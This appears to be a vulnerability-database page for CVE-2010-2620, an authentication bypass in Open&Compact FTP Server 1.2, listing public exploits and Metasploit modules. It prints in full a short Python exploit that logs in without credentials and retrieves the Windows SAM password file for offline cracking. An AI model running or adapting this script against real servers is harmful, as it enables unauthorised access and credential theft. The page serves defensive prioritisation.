VIR Vulnerability Intelligence Relay

CVE-2010-2620

critical
Published 2010-07-02 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Open&Compact FTP Server (Open-FTPD) 1.2 and earlier allows remote attackers to bypass authentication by sending (1) LIST, (2) RETR, (3) STOR, or other commands without performing the required login steps first.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-13932 remote windows verified
Serge Gorbunov ยท 2010-06-18

(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access

Source code queued for fetch โ€” refresh in a moment.
EDB-27401 remote windows verified python ยท 1 KB
Wireghoul ยท 2013-08-07

(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval

python exploit Source: Exploit-DB 
#!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3

# Abusing authentication bypass in combination with a directory traversal to grab
# the sam file for offline cracking

import ftplib
import os

# Connect to server

ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )

# Note that we need no authentication at all!!

print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )

ftp.quit()
EDB-27556 remote windows verified
Metasploit ยท 2013-08-13

Open-FTPD 1.2 - Arbitrary File Upload (Metasploit)

Source code queued for fetch โ€” refresh in a moment.

Metasploit modules

exploit_windows/ftp/open_ftpd_wbem rank 600
Open-FTPD 1.2 Arbitrary File Upload
Source fetch failed: fetch_error โ€” view the original via the link above.

Application impact
VendorProductVersionsFixed
open-ftpdopen-ftpd{"endIncluding":"1.2"}
open-ftpdopen-ftpd1.0

References

CWEs

CWE-287

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.